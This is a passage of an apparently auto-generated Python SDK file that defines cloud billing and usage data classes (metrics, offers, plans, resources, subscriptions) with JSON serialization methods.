unit_name: str = None,
non_chargeable: bool = None) -> None:
"""
Initialize a Metric object.
:param str metric: The ID of the metric.
:param float quantity: The aggregated value for the metric.
:param float cost: The cost incurred by the metric.
        :param float rated_cost: The pre-discount cost incurred by the metric.
:param List[Discount] discounts: All the discounts applicable to the
metric.
:param str metric_name: (optional) The name of the metric.
:param float rateable_quantity: (optional) The quantity that is used for
calculating charges.
:param List[object] price: (optional) The price with which the cost was
calculated.
:param str unit: (optional) The unit that qualifies the quantity.
:param str unit_name: (optional) The name of the unit.
        :param bool non_chargeable: (optional) When set to `true`, the cost is
        for informational purposes and is not included when calculating the
        plan charges.
"""
self.metric = metric
self.metric_name = metric_name
self.quantity = quantity
self.rateable_quantity = rateable_quantity
self.cost = cost
self.rated_cost = rated_cost
self.price = price
self.unit = unit
self.unit_name = unit_name
self.non_chargeable = non_chargeable
self.discounts = discounts
@classmethod
def from_dict(cls, _dict: Dict) -> 'Metric':
"""Initialize a Metric object from a json dictionary."""
args = {}
if 'metric' in _dict:
args['metric'] = _dict.get('metric')
else:
raise ValueError('Required property \'metric\' not present in Metric JSON')
if 'metric_name' in _dict:
args['metric_name'] = _dict.get('metric_name')
if 'quantity' in _dict:
args['quantity'] = _dict.get('quantity')
else:
raise ValueError('Required property \'quantity\' not present in Metric JSON')
if 'rateable_quantity' in _dict:
args['rateable_quantity'] = _dict.get('rateable_quantity')
if 'cost' in _dict:
args['cost'] = _dict.get('cost')
else:
raise ValueError('Required property \'cost\' not present in Metric JSON')
if 'rated_cost' in _dict:
args['rated_cost'] = _dict.get('rated_cost')
else:
raise ValueError('Required property \'rated_cost\' not present in Metric JSON')
if 'price' in _dict:
args['price'] = _dict.get('price')
if 'unit' in _dict:
args['unit'] = _dict.get('unit')
if 'unit_name' in _dict:
args['unit_name'] = _dict.get('unit_name')
if 'non_chargeable' in _dict:
args['non_chargeable'] = _dict.get('non_chargeable')
if 'discounts' in _dict:
args['discounts'] = [Discount.from_dict(x) for x in _dict.get('discounts')]
else:
raise ValueError('Required property \'discounts\' not present in Metric JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a Metric object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'metric') and self.metric is not None:
_dict['metric'] = self.metric
if hasattr(self, 'metric_name') and self.metric_name is not None:
_dict['metric_name'] = self.metric_name
if hasattr(self, 'quantity') and self.quantity is not None:
_dict['quantity'] = self.quantity
if hasattr(self, 'rateable_quantity') and self.rateable_quantity is not None:
_dict['rateable_quantity'] = self.rateable_quantity
if hasattr(self, 'cost') and self.cost is not None:
_dict['cost'] = self.cost
if hasattr(self, 'rated_cost') and self.rated_cost is not None:
_dict['rated_cost'] = self.rated_cost
if hasattr(self, 'price') and self.price is not None:
_dict['price'] = self.price
if hasattr(self, 'unit') and self.unit is not None:
_dict['unit'] = self.unit
if hasattr(self, 'unit_name') and self.unit_name is not None:
_dict['unit_name'] = self.unit_name
if hasattr(self, 'non_chargeable') and self.non_chargeable is not None:
_dict['non_chargeable'] = self.non_chargeable
if hasattr(self, 'discounts') and self.discounts is not None:
_dict['discounts'] = [x.to_dict() for x in self.discounts]
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this Metric object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'Metric') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'Metric') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
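# Sketch (an inference from the field descriptions above, not a documented
# guarantee): since `rated_cost` is the pre-discount figure, the effective
# discount on a metric can be estimated as:
#   pct = 100.0 * (1 - metric.cost / metric.rated_cost) if metric.rated_cost else 0.0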
class Offer():
"""
Information about an individual offer.
:attr str offer_id: The ID of the offer.
:attr float credits_total: The total credits before applying the offer.
:attr str offer_template: The template with which the offer was generated.
:attr datetime valid_from: The date from which the offer is valid.
    :attr datetime expires_on: The date until which the offer is valid.
:attr OfferCredits credits: Credit information related to an offer.
"""
def __init__(self,
offer_id: str,
credits_total: float,
offer_template: str,
valid_from: datetime,
expires_on: datetime,
credits: 'OfferCredits') -> None:
"""
        Initialize an Offer object.
:param str offer_id: The ID of the offer.
:param float credits_total: The total credits before applying the offer.
:param str offer_template: The template with which the offer was generated.
:param datetime valid_from: The date from which the offer is valid.
        :param datetime expires_on: The date until which the offer is valid.
:param OfferCredits credits: Credit information related to an offer.
"""
self.offer_id = offer_id
self.credits_total = credits_total
self.offer_template = offer_template
self.valid_from = valid_from
self.expires_on = expires_on
self.credits = credits
@classmethod
def from_dict(cls, _dict: Dict) -> 'Offer':
"""Initialize a Offer object from a json dictionary."""
args = {}
if 'offer_id' in _dict:
args['offer_id'] = _dict.get('offer_id')
else:
raise ValueError('Required property \'offer_id\' not present in Offer JSON')
if 'credits_total' in _dict:
args['credits_total'] = _dict.get('credits_total')
else:
raise ValueError('Required property \'credits_total\' not present in Offer JSON')
if 'offer_template' in _dict:
args['offer_template'] = _dict.get('offer_template')
else:
raise ValueError('Required property \'offer_template\' not present in Offer JSON')
if 'valid_from' in _dict:
args['valid_from'] = string_to_datetime(_dict.get('valid_from'))
else:
raise ValueError('Required property \'valid_from\' not present in Offer JSON')
if 'expires_on' in _dict:
args['expires_on'] = string_to_datetime(_dict.get('expires_on'))
else:
raise ValueError('Required property \'expires_on\' not present in Offer JSON')
if 'credits' in _dict:
args['credits'] = OfferCredits.from_dict(_dict.get('credits'))
else:
raise ValueError('Required property \'credits\' not present in Offer JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a Offer object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'offer_id') and self.offer_id is not None:
_dict['offer_id'] = self.offer_id
if hasattr(self, 'credits_total') and self.credits_total is not None:
_dict['credits_total'] = self.credits_total
if hasattr(self, 'offer_template') and self.offer_template is not None:
_dict['offer_template'] = self.offer_template
if hasattr(self, 'valid_from') and self.valid_from is not None:
_dict['valid_from'] = datetime_to_string(self.valid_from)
if hasattr(self, 'expires_on') and self.expires_on is not None:
_dict['expires_on'] = datetime_to_string(self.expires_on)
if hasattr(self, 'credits') and self.credits is not None:
_dict['credits'] = self.credits.to_dict()
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this Offer object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'Offer') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'Offer') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
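# Note: `valid_from` and `expires_on` are `datetime` objects on the model but
# strings on the wire; `from_dict` and `to_dict` convert them with
# string_to_datetime / datetime_to_string. Sketch (placeholder input):
#   offer = Offer.from_dict(offer_dict)
#   remaining = offer.credits.balance  # credits left on the offer this month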
class OfferCredits():
"""
Credit information related to an offer.
:attr float starting_balance: The available credits in the offer at the
beginning of the month.
:attr float used: The credits used in this month.
:attr float balance: The remaining credits in the offer.
"""
def __init__(self,
starting_balance: float,
used: float,
balance: float) -> None:
"""
        Initialize an OfferCredits object.
:param float starting_balance: The available credits in the offer at the
beginning of the month.
:param float used: The credits used in this month.
:param float balance: The remaining credits in the offer.
"""
self.starting_balance = starting_balance
self.used = used
self.balance = balance
@classmethod
def from_dict(cls, _dict: Dict) -> 'OfferCredits':
"""Initialize a OfferCredits object from a json dictionary."""
args = {}
if 'starting_balance' in _dict:
args['starting_balance'] = _dict.get('starting_balance')
else:
raise ValueError('Required property \'starting_balance\' not present in OfferCredits JSON')
if 'used' in _dict:
args['used'] = _dict.get('used')
else:
raise ValueError('Required property \'used\' not present in OfferCredits JSON')
if 'balance' in _dict:
args['balance'] = _dict.get('balance')
else:
raise ValueError('Required property \'balance\' not present in OfferCredits JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a OfferCredits object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'starting_balance') and self.starting_balance is not None:
_dict['starting_balance'] = self.starting_balance
if hasattr(self, 'used') and self.used is not None:
_dict['used'] = self.used
if hasattr(self, 'balance') and self.balance is not None:
_dict['balance'] = self.balance
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this OfferCredits object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'OfferCredits') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'OfferCredits') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
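# Illustrative sketch (not from the SDK source): a hypothetical JSON payload
# that Offer.from_dict() would accept, inferred from the required-property
# checks above. The 'valid_from'/'expires_on' strings are parsed with
# string_to_datetime, and 'credits' is parsed with OfferCredits.from_dict.
#
#   {
#     "offer_id": "offer-123",                  # hypothetical ID
#     "credits_total": 1000.0,
#     "offer_template": "promotional",          # hypothetical template name
#     "valid_from": "2021-01-01T00:00:00Z",
#     "expires_on": "2021-12-31T23:59:59Z",
#     "credits": {"starting_balance": 1000.0, "used": 100.0, "balance": 900.0}
#   }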
class OrgUsage():
"""
The aggregated usage and charges for all the plans in the org.
:attr str account_id: The ID of the account.
:attr str organization_id: The ID of the organization.
:attr str organization_name: (optional) The name of the organization.
:attr str pricing_country: The target country pricing that should be used.
:attr str currency_code: The currency for the cost fields in the resources,
plans and metrics.
:attr str month: The month.
    :attr List[Resource] resources: All the resources used in the account.
"""
def __init__(self,
account_id: str,
organization_id: str,
pricing_country: str,
currency_code: str,
month: str,
resources: List['Resource'],
*,
organization_name: str = None) -> None:
"""
        Initialize an OrgUsage object.
:param str account_id: The ID of the account.
:param str organization_id: The ID of the organization.
:param str pricing_country: The target country pricing that should be used.
:param str currency_code: The currency for the cost fields in the
resources, plans and metrics.
:param str month: The month.
        :param List[Resource] resources: All the resources used in the account.
:param str organization_name: (optional) The name of the organization.
"""
self.account_id = account_id
self.organization_id = organization_id
self.organization_name = organization_name
self.pricing_country = pricing_country
self.currency_code = currency_code
self.month = month
self.resources = resources
@classmethod
def from_dict(cls, _dict: Dict) -> 'OrgUsage':
"""Initialize a OrgUsage object from a json dictionary."""
args = {}
if 'account_id' in _dict:
args['account_id'] = _dict.get('account_id')
else:
raise ValueError('Required property \'account_id\' not present in OrgUsage JSON')
if 'organization_id' in _dict:
args['organization_id'] = _dict.get('organization_id')
else:
raise ValueError('Required property \'organization_id\' not present in OrgUsage JSON')
if 'organization_name' in _dict:
args['organization_name'] = _dict.get('organization_name')
if 'pricing_country' in _dict:
args['pricing_country'] = _dict.get('pricing_country')
else:
raise ValueError('Required property \'pricing_country\' not present in OrgUsage JSON')
if 'currency_code' in _dict:
args['currency_code'] = _dict.get('currency_code')
else:
raise ValueError('Required property \'currency_code\' not present in OrgUsage JSON')
if 'month' in _dict:
args['month'] = _dict.get('month')
else:
raise ValueError('Required property \'month\' not present in OrgUsage JSON')
if 'resources' in _dict:
args['resources'] = [Resource.from_dict(x) for x in _dict.get('resources')]
else:
raise ValueError('Required property \'resources\' not present in OrgUsage JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a OrgUsage object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'account_id') and self.account_id is not None:
_dict['account_id'] = self.account_id
if hasattr(self, 'organization_id') and self.organization_id is not None:
_dict['organization_id'] = self.organization_id
if hasattr(self, 'organization_name') and self.organization_name is not None:
_dict['organization_name'] = self.organization_name
if hasattr(self, 'pricing_country') and self.pricing_country is not None:
_dict['pricing_country'] = self.pricing_country
if hasattr(self, 'currency_code') and self.currency_code is not None:
_dict['currency_code'] = self.currency_code
if hasattr(self, 'month') and self.month is not None:
_dict['month'] = self.month
if hasattr(self, 'resources') and self.resources is not None:
_dict['resources'] = [x.to_dict() for x in self.resources]
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this OrgUsage object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'OrgUsage') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'OrgUsage') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class Plan():
"""
The aggregated values for the plan.
:attr str plan_id: The ID of the plan.
:attr str plan_name: (optional) The name of the plan.
:attr str pricing_region: (optional) The pricing region for the plan.
:attr bool billable: Indicates if the plan charges are billed to the customer.
:attr float cost: The total cost incurred by the plan.
:attr float rated_cost: Total pre-discounted cost incurred by the plan.
:attr List[Metric] usage: All the metrics in the plan.
:attr List[Discount] discounts: All the discounts applicable to the plan.
"""
def __init__(self,
plan_id: str,
billable: bool,
cost: float,
rated_cost: float,
usage: List['Metric'],
discounts: List['Discount'],
*,
plan_name: str = None,
pricing_region: str = None) -> None:
"""
Initialize a Plan object.
:param str plan_id: The ID of the plan.
:param bool billable: Indicates if the plan charges are billed to the
customer.
:param float cost: The total cost incurred by the plan.
:param float rated_cost: Total pre-discounted cost incurred by the plan.
:param List[Metric] usage: All the metrics in the plan.
:param List[Discount] discounts: All the discounts applicable to the plan.
:param str plan_name: (optional) The name of the plan.
:param str pricing_region: (optional) The pricing region for the plan.
"""
self.plan_id = plan_id
self.plan_name = plan_name
self.pricing_region = pricing_region
self.billable = billable
self.cost = cost
self.rated_cost = rated_cost
self.usage = usage
self.discounts = discounts
@classmethod
def from_dict(cls, _dict: Dict) -> 'Plan':
"""Initialize a Plan object from a json dictionary."""
args = {}
if 'plan_id' in _dict:
args['plan_id'] = _dict.get('plan_id')
else:
raise ValueError('Required property \'plan_id\' not present in Plan JSON')
if 'plan_name' in _dict:
args['plan_name'] = _dict.get('plan_name')
if 'pricing_region' in _dict:
args['pricing_region'] = _dict.get('pricing_region')
if 'billable' in _dict:
args['billable'] = _dict.get('billable')
else:
raise ValueError('Required property \'billable\' not present in Plan JSON')
if 'cost' in _dict:
args['cost'] = _dict.get('cost')
else:
raise ValueError('Required property \'cost\' not present in Plan JSON')
if 'rated_cost' in _dict:
args['rated_cost'] = _dict.get('rated_cost')
else:
raise ValueError('Required property \'rated_cost\' not present in Plan JSON')
if 'usage' in _dict:
args['usage'] = [Metric.from_dict(x) for x in _dict.get('usage')]
else:
raise ValueError('Required property \'usage\' not present in Plan JSON')
if 'discounts' in _dict:
args['discounts'] = [Discount.from_dict(x) for x in _dict.get('discounts')]
else:
raise ValueError('Required property \'discounts\' not present in Plan JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a Plan object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'plan_id') and self.plan_id is not None:
_dict['plan_id'] = self.plan_id
if hasattr(self, 'plan_name') and self.plan_name is not None:
_dict['plan_name'] = self.plan_name
if hasattr(self, 'pricing_region') and self.pricing_region is not None:
_dict['pricing_region'] = self.pricing_region
if hasattr(self, 'billable') and self.billable is not None:
_dict['billable'] = self.billable
if hasattr(self, 'cost') and self.cost is not None:
_dict['cost'] = self.cost
if hasattr(self, 'rated_cost') and self.rated_cost is not None:
_dict['rated_cost'] = self.rated_cost
if hasattr(self, 'usage') and self.usage is not None:
_dict['usage'] = [x.to_dict() for x in self.usage]
if hasattr(self, 'discounts') and self.discounts is not None:
_dict['discounts'] = [x.to_dict() for x in self.discounts]
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this Plan object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'Plan') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'Plan') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class Resource():
"""
The container for all the plans in the resource.
:attr str resource_id: The ID of the resource.
:attr str resource_name: (optional) The name of the resource.
:attr float billable_cost: The billable charges for the account.
:attr float billable_rated_cost: The pre-discounted billable charges for the
account.
:attr float non_billable_cost: The non-billable charges for the account.
:attr float non_billable_rated_cost: The pre-discounted non-billable charges for
the account.
:attr List[Plan] plans: All the plans in the resource.
:attr List[Discount] discounts: All the discounts applicable to the resource.
"""
def __init__(self,
resource_id: str,
billable_cost: float,
billable_rated_cost: float,
non_billable_cost: float,
non_billable_rated_cost: float,
plans: List['Plan'],
discounts: List['Discount'],
*,
resource_name: str = None) -> None:
"""
Initialize a Resource object.
:param str resource_id: The ID of the resource.
:param float billable_cost: The billable charges for the account.
:param float billable_rated_cost: The pre-discounted billable charges for
the account.
:param float non_billable_cost: The non-billable charges for the account.
:param float non_billable_rated_cost: The pre-discounted non-billable
charges for the account.
:param List[Plan] plans: All the plans in the resource.
:param List[Discount] discounts: All the discounts applicable to the
resource.
:param str resource_name: (optional) The name of the resource.
"""
self.resource_id = resource_id
self.resource_name = resource_name
self.billable_cost = billable_cost
self.billable_rated_cost = billable_rated_cost
self.non_billable_cost = non_billable_cost
self.non_billable_rated_cost = non_billable_rated_cost
self.plans = plans
self.discounts = discounts
@classmethod
def from_dict(cls, _dict: Dict) -> 'Resource':
"""Initialize a Resource object from a json dictionary."""
args = {}
if 'resource_id' in _dict:
args['resource_id'] = _dict.get('resource_id')
else:
raise ValueError('Required property \'resource_id\' not present in Resource JSON')
if 'resource_name' in _dict:
args['resource_name'] = _dict.get('resource_name')
if 'billable_cost' in _dict:
args['billable_cost'] = _dict.get('billable_cost')
else:
raise ValueError('Required property \'billable_cost\' not present in Resource JSON')
if 'billable_rated_cost' in _dict:
args['billable_rated_cost'] = _dict.get('billable_rated_cost')
else:
raise ValueError('Required property \'billable_rated_cost\' not present in Resource JSON')
if 'non_billable_cost' in _dict:
args['non_billable_cost'] = _dict.get('non_billable_cost')
else:
raise ValueError('Required property \'non_billable_cost\' not present in Resource JSON')
if 'non_billable_rated_cost' in _dict:
args['non_billable_rated_cost'] = _dict.get('non_billable_rated_cost')
else:
raise ValueError('Required property \'non_billable_rated_cost\' not present in Resource JSON')
if 'plans' in _dict:
args['plans'] = [Plan.from_dict(x) for x in _dict.get('plans')]
else:
raise ValueError('Required property \'plans\' not present in Resource JSON')
if 'discounts' in _dict:
args['discounts'] = [Discount.from_dict(x) for x in _dict.get('discounts')]
else:
raise ValueError('Required property \'discounts\' not present in Resource JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a Resource object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'resource_id') and self.resource_id is not None:
_dict['resource_id'] = self.resource_id
if hasattr(self, 'resource_name') and self.resource_name is not None:
_dict['resource_name'] = self.resource_name
if hasattr(self, 'billable_cost') and self.billable_cost is not None:
_dict['billable_cost'] = self.billable_cost
if hasattr(self, 'billable_rated_cost') and self.billable_rated_cost is not None:
_dict['billable_rated_cost'] = self.billable_rated_cost
if hasattr(self, 'non_billable_cost') and self.non_billable_cost is not None:
_dict['non_billable_cost'] = self.non_billable_cost
if hasattr(self, 'non_billable_rated_cost') and self.non_billable_rated_cost is not None:
_dict['non_billable_rated_cost'] = self.non_billable_rated_cost
if hasattr(self, 'plans') and self.plans is not None:
_dict['plans'] = [x.to_dict() for x in self.plans]
if hasattr(self, 'discounts') and self.discounts is not None:
_dict['discounts'] = [x.to_dict() for x in self.discounts]
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this Resource object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'Resource') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'Resource') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class ResourceGroupUsage():
"""
The aggregated usage and charges for all the plans in the resource group.
:attr str account_id: The ID of the account.
:attr str resource_group_id: The ID of the resource group.
:attr str resource_group_name: (optional) The name of the resource group.
:attr str pricing_country: The target country pricing that should be used.
:attr str currency_code: The currency for the cost fields in the resources,
plans and metrics.
:attr str month: The month.
    :attr List[Resource] resources: All the resources used in the account.
"""
def __init__(self,
account_id: str,
resource_group_id: str,
pricing_country: str,
currency_code: str,
month: str,
resources: List['Resource'],
*,
resource_group_name: str = None) -> None:
"""
Initialize a ResourceGroupUsage object.
:param str account_id: The ID of the account.
:param str resource_group_id: The ID of the resource group.
:param str pricing_country: The target country pricing that should be used.
:param str currency_code: The currency for the cost fields in the
resources, plans and metrics.
:param str month: The month.
        :param List[Resource] resources: All the resources used in the account.
:param str resource_group_name: (optional) The name of the resource group.
"""
self.account_id = account_id
self.resource_group_id = resource_group_id
self.resource_group_name = resource_group_name
self.pricing_country = pricing_country
self.currency_code = currency_code
self.month = month
self.resources = resources
@classmethod
def from_dict(cls, _dict: Dict) -> 'ResourceGroupUsage':
"""Initialize a ResourceGroupUsage object from a json dictionary."""
args = {}
if 'account_id' in _dict:
args['account_id'] = _dict.get('account_id')
else:
raise ValueError('Required property \'account_id\' not present in ResourceGroupUsage JSON')
if 'resource_group_id' in _dict:
args['resource_group_id'] = _dict.get('resource_group_id')
else:
raise ValueError('Required property \'resource_group_id\' not present in ResourceGroupUsage JSON')
if 'resource_group_name' in _dict:
args['resource_group_name'] = _dict.get('resource_group_name')
if 'pricing_country' in _dict:
args['pricing_country'] = _dict.get('pricing_country')
else:
raise ValueError('Required property \'pricing_country\' not present in ResourceGroupUsage JSON')
if 'currency_code' in _dict:
args['currency_code'] = _dict.get('currency_code')
else:
raise ValueError('Required property \'currency_code\' not present in ResourceGroupUsage JSON')
if 'month' in _dict:
args['month'] = _dict.get('month')
else:
raise ValueError('Required property \'month\' not present in ResourceGroupUsage JSON')
if 'resources' in _dict:
args['resources'] = [Resource.from_dict(x) for x in _dict.get('resources')]
else:
raise ValueError('Required property \'resources\' not present in ResourceGroupUsage JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a ResourceGroupUsage object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'account_id') and self.account_id is not None:
_dict['account_id'] = self.account_id
if hasattr(self, 'resource_group_id') and self.resource_group_id is not None:
_dict['resource_group_id'] = self.resource_group_id
if hasattr(self, 'resource_group_name') and self.resource_group_name is not None:
_dict['resource_group_name'] = self.resource_group_name
if hasattr(self, 'pricing_country') and self.pricing_country is not None:
_dict['pricing_country'] = self.pricing_country
if hasattr(self, 'currency_code') and self.currency_code is not None:
_dict['currency_code'] = self.currency_code
if hasattr(self, 'month') and self.month is not None:
_dict['month'] = self.month
if hasattr(self, 'resources') and self.resources is not None:
_dict['resources'] = [x.to_dict() for x in self.resources]
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this ResourceGroupUsage object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'ResourceGroupUsage') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'ResourceGroupUsage') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class ResourcesSummary():
"""
Charges related to cloud resources.
:attr float billable_cost: The billable charges for all cloud resources used in
the account.
:attr float non_billable_cost: Non-billable charges for all cloud resources used
in the account.
"""
def __init__(self,
billable_cost: float,
non_billable_cost: float) -> None:
"""
Initialize a ResourcesSummary object.
:param float billable_cost: The billable charges for all cloud resources
used in the account.
:param float non_billable_cost: Non-billable charges for all cloud
resources used in the account.
"""
self.billable_cost = billable_cost
self.non_billable_cost = non_billable_cost
@classmethod
def from_dict(cls, _dict: Dict) -> 'ResourcesSummary':
"""Initialize a ResourcesSummary object from a json dictionary."""
args = {}
if 'billable_cost' in _dict:
args['billable_cost'] = _dict.get('billable_cost')
else:
raise ValueError('Required property \'billable_cost\' not present in ResourcesSummary JSON')
if 'non_billable_cost' in _dict:
args['non_billable_cost'] = _dict.get('non_billable_cost')
else:
raise ValueError('Required property \'non_billable_cost\' not present in ResourcesSummary JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a ResourcesSummary object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'billable_cost') and self.billable_cost is not None:
_dict['billable_cost'] = self.billable_cost
if hasattr(self, 'non_billable_cost') and self.non_billable_cost is not None:
_dict['non_billable_cost'] = self.non_billable_cost
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this ResourcesSummary object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'ResourcesSummary') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'ResourcesSummary') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class Subscription():
"""
Subscription.
:attr str subscription_id: The ID of the subscription.
:attr str charge_agreement_number: The charge agreement number of the
    subscription.
:attr str type: Type of the subscription.
:attr float subscription_amount: The credits available in the subscription for
the month.
:attr datetime start: The date from which the subscription was active.
:attr datetime end: (optional) The date until which the subscription is active.
End time is unavailable for PayGO accounts.
:attr float credits_total: The total credits available in the subscription.
    :attr List[SubscriptionTerm] terms: The terms into which the subscription is
    split.
"""
def __init__(self,
subscription_id: str,
charge_agreement_number: str,
type: str,
subscription_amount: float,
start: datetime,
credits_total: float,
terms: List['SubscriptionTerm'],
*,
end: datetime = None) -> None:
"""
Initialize a Subscription object.
:param str subscription_id: The ID of the subscription.
:param str charge_agreement_number: The charge agreement number of the
        subscription.
:param str type: Type of the subscription.
:param float subscription_amount: The credits available in the subscription
for the month.
:param datetime start: The date from which the subscription was active.
:param float credits_total: The total credits available in the
subscription.
        :param List[SubscriptionTerm] terms: The terms into which the
        subscription is split.
:param datetime end: (optional) The date until which the subscription is
active. End time is unavailable for PayGO accounts.
"""
self.subscription_id = subscription_id
self.charge_agreement_number = charge_agreement_number
self.type = type
self.subscription_amount = subscription_amount
self.start = start
self.end = end
self.credits_total = credits_total
self.terms = terms
@classmethod
def from_dict(cls, _dict: Dict) -> 'Subscription':
"""Initialize a Subscription object from a json dictionary."""
args = {}
if 'subscription_id' in _dict:
args['subscription_id'] = _dict.get('subscription_id')
else:
raise ValueError('Required property \'subscription_id\' not present in Subscription JSON')
if 'charge_agreement_number' in _dict:
args['charge_agreement_number'] = _dict.get('charge_agreement_number')
else:
raise ValueError('Required property \'charge_agreement_number\' not present in Subscription JSON')
if 'type' in _dict:
args['type'] = _dict.get('type')
else:
raise ValueError('Required property \'type\' not present in Subscription JSON')
if 'subscription_amount' in _dict:
args['subscription_amount'] = _dict.get('subscription_amount')
else:
raise ValueError('Required property \'subscription_amount\' not present in Subscription JSON')
if 'start' in _dict:
args['start'] = string_to_datetime(_dict.get('start'))
else:
raise ValueError('Required property \'start\' not present in Subscription JSON')
if 'end' in _dict:
args['end'] = string_to_datetime(_dict.get('end'))
if 'credits_total' in _dict:
args['credits_total'] = _dict.get('credits_total')
else:
raise ValueError('Required property \'credits_total\' not present in Subscription JSON')
if 'terms' in _dict:
args['terms'] = [SubscriptionTerm.from_dict(x) for x in _dict.get('terms')]
else:
raise ValueError('Required property \'terms\' not present in Subscription JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a Subscription object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'subscription_id') and self.subscription_id is not None:
_dict['subscription_id'] = self.subscription_id
if hasattr(self, 'charge_agreement_number') and self.charge_agreement_number is not None:
_dict['charge_agreement_number'] = self.charge_agreement_number
if hasattr(self, 'type') and self.type is not None:
_dict['type'] = self.type
if hasattr(self, 'subscription_amount') and self.subscription_amount is not None:
_dict['subscription_amount'] = self.subscription_amount
if hasattr(self, 'start') and self.start is not None:
_dict['start'] = datetime_to_string(self.start)
if hasattr(self, 'end') and self.end is not None:
_dict['end'] = datetime_to_string(self.end)
if hasattr(self, 'credits_total') and self.credits_total is not None:
_dict['credits_total'] = self.credits_total
if hasattr(self, 'terms') and self.terms is not None:
_dict['terms'] = [x.to_dict() for x in self.terms]
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this Subscription object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'Subscription') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'Subscription') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class SubscriptionSummary():
"""
A summary of charges and credits related to a subscription.
